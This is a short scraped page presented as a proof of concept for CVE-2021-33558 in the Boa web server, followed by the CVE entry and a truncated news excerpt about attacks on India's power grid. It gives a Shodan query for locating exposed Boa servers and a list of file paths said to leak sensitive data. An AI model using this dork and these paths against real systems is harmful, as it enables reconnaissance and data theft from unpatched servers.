CVE-2021-33558 POC
CVE-2021-33558 Reference: wwwcvedetailscom/cve/CVE-2021-33558 Shodan dork: product:"Boa Web Server" 09413 Payload: /backuphtml /previewhtml /js/logjs /loghtml /emailhtml /online-usershtml /configjs POC:
Boa 0.94.13 allows remote malicious users to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
boa boa 0.94.13 |
Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Flaws in the open-source tool exploited – and India's power grid was a target
Microsoft is warning that systems using the long-discontinued Boa web server could be at risk of attacks after a series of intrusion attempts of power grid operations in India likely included exploiting security flaws in the technology. Researchers with Microsoft's Security Threat Intelligence unit examined an April report from cybersecurity company Recorded Future about the intrusion efforts into India's power grid dating back to 2020 and, more recently, into a national emergency response syste...